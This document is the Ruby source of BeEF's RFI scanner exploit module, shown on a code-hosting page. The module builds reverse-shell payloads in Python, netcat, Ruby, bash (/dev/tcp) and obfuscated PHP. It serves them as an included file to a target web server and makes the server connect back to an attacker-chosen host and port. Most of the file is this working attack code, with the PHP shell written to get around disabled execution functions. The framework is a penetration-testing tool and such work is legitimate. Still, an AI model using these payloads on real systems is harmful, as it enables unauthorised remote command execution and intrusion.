Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/rfi_scanner/module.rb
1154 views
1
#

2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
# Browser Exploitation Framework (BeEF) - https://beefproject.com

4
# See the file 'doc/COPYING' for copying permission

5
#

6
class Rfi_scanner < BeEF::Core::Command

7
  def pre_send

8
    lhost = '127.0.0.1'

9
    lport = 4444

10
    payload = 'reverse_php'

11
    @datastore.each do |input|

12
      case input['name']

13
      when 'lhost'

14
        lhost = input['value']

15
      when 'lport'

16
        lport = input['value']

17
      end

18
    end

19
    @datastore.each do |input|

20
      next unless input['name'] == 'payload'

21


22
      case input['value']

23
      when 'reverse_python' # msfvenom -p cmd/unix/reverse_python LHOST=X.X.X.X LPORT=XXXX

24
        cmd = Base64.strict_encode64("import socket,subprocess,os;host='#{lhost}';port=#{lport};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);")

25
        payload = "`python -c \"exec ('#{cmd}'.decode ('base64') )\"`"

26
      when 'reverse_netcat'

27
        payload = "`nc #{lhost} #{lport} -e /bin/sh`"

28
      when 'reverse_ruby' # msfvenom -p cmd/unix/reverse_ruby LHOST=X.X.X.X LPORT=XXXX

29
        payload = "`ruby -rsocket -e \"exit if fork;c=TCPSocket.new('#{lhost}','#{lport}');while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end\"`"

30
      when 'reverse_bash'

31
        payload = "`bash -c \"/bin/bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1\"`"

32
      else # "reverse_php" # msfvenom -p php/reverse_php LHOST=X.X.X.X LPORT=XXXX

33
        payload = <<-EOS

34
    $ipaddr='#{lhost}';

35
    $port=#{lport};

36


37
      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);

38
      $dis=@ini_get('disable_functions');

39
      if(!empty($dis)){

40
        $dis=preg_replace('/[, ]+/', ',', $dis);

41
        $dis=explode(',', $dis);

42
        $dis=array_map('trim', $dis);

43
      }else{

44
        $dis=array();

45
      }

46
    #{'  '}

47


48
    if(!function_exists('zBoGL')){

49
      function zBoGL($c){

50
        global $dis;

51
    #{'    '}

52
      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {

53
        $c=$c." 2>&1\\n";

54
      }

55
      $eclnc='is_callable';

56
      $wGGmd='in_array';

57
    #{'  '}

58
      if($eclnc('system')and!$wGGmd('system',$dis)){

59
        ob_start();

60
        system($c);

61
        $o=ob_get_contents();

62
        ob_end_clean();

63
      }else

64
      if($eclnc('popen')and!$wGGmd('popen',$dis)){

65
        $fp=popen($c,'r');

66
        $o=NULL;

67
        if(is_resource($fp)){

68
          while(!feof($fp)){

69
            $o.=fread($fp,1024);

70
          }

71
        }

72
        @pclose($fp);

73
      }else

74
      if($eclnc('passthru')and!$wGGmd('passthru',$dis)){

75
        ob_start();

76
        passthru($c);

77
        $o=ob_get_contents();

78
        ob_end_clean();

79
      }else

80
      if($eclnc('proc_open')and!$wGGmd('proc_open',$dis)){

81
        $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);

82
        $o=NULL;

83
        while(!feof($pipes[1])){

84
          $o.=fread($pipes[1],1024);

85
        }

86
        @proc_close($handle);

87
      }else

88
      if($eclnc('exec')and!$wGGmd('exec',$dis)){

89
        $o=array();

90
        exec($c,$o);

91
        $o=join(chr(10),$o).chr(10);

92
      }else

93
      if($eclnc('shell_exec')and!$wGGmd('shell_exec',$dis)){

94
        $o=shell_exec($c);

95
      }else

96
      {

97
        $o=0;

98
      }

99


100
        return $o;

101
      }

102
    }

103
    $nofuncs='no exec functions';

104
    if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){

105
      $s=@fsockopen("tcp://#{lhost}",$port);

106
      while($c=fread($s,2048)){

107
        $out = '';

108
        if(substr($c,0,3) == 'cd '){

109
          chdir(substr($c,3,-1));

110
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {

111
          break;

112
        }else{

113
          $out=zBoGL(substr($c,0,-1));

114
          if($out===false){

115
            fwrite($s,$nofuncs);

116
            break;

117
          }

118
        }

119
        fwrite($s,$out);

120
      }

121
      fclose($s);

122
    }else{

123
      $s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);

124
      @socket_connect($s,$ipaddr,$port);

125
      @socket_write($s,"socket_create");

126
      while($c=@socket_read($s,2048)){

127
        $out = '';

128
        if(substr($c,0,3) == 'cd '){

129
          chdir(substr($c,3,-1));

130
        } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {

131
          break;

132
        }else{

133
          $out=zBoGL(substr($c,0,-1));

134
          if($out===false){

135
            @socket_write($s,$nofuncs);

136
            break;

137
          }

138
        }

139
        @socket_write($s,$out,strlen($out));

140
      }

141
      @socket_close($s);

142
    }

143
        EOS

144


145
      end

146
    end

147
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/plain' }, "<?php #{payload} ?>", "/rfi_php_#{@command_id}.txt", -1)

148
  end

149


150
  def self.options

151
    configuration = BeEF::Core::Configuration.instance

152
    lhost = configuration.beef_host

153
    lhost = '' if lhost == '0.0.0.0'

154
    [

155
      { 'name' => 'rproto',

156
        'type' => 'combobox',

157
        'ui_label' => 'Target Protocol',

158
        'store_type' => 'arraystore',

159
        'store_fields' => ['rproto'],

160
        'store_data' => [

161
          ['http'],

162
          ['https']

163
        ],

164
        'emptyText' => 'Select a protocol (HTTP/HTTPS)',

165
        'valueField' => 'rproto',

166
        'displayField' => 'rproto',

167
        'mode' => 'local',

168
        'autoWidth' => true },

169
      { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },

170
      { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },

171
      { 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },

172
      { 'name' => 'payload',

173
        'type' => 'combobox',

174
        'ui_label' => 'Payload',

175
        'store_type' => 'arraystore',

176
        'store_fields' => ['payload'],

177
        'store_data' => [['reverse_bash'], ['reverse_netcat'], ['reverse_ruby'], ['reverse_python'], ['reverse_php']],

178
        'emptyText' => 'Select a payload',

179
        'valueField' => 'payload',

180
        'displayField' => 'payload',

181
        'mode' => 'local',

182
        'forceSelection' => 'false',

183
        'autoWidth' => true },

184
      { 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost },

185
      { 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444' },

186
      { 'name' => 'wait', 'ui_label' => 'Wait between requests (s)', 'value' => '0.3', 'width' => '100px' }

187
    ]

188
  end

189


190
  def post_execute

191
    save({ 'result' => @datastore['result'] })

192
    # BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/rfi_php_#{@command_id}.txt")

193
  end

194
end

195


196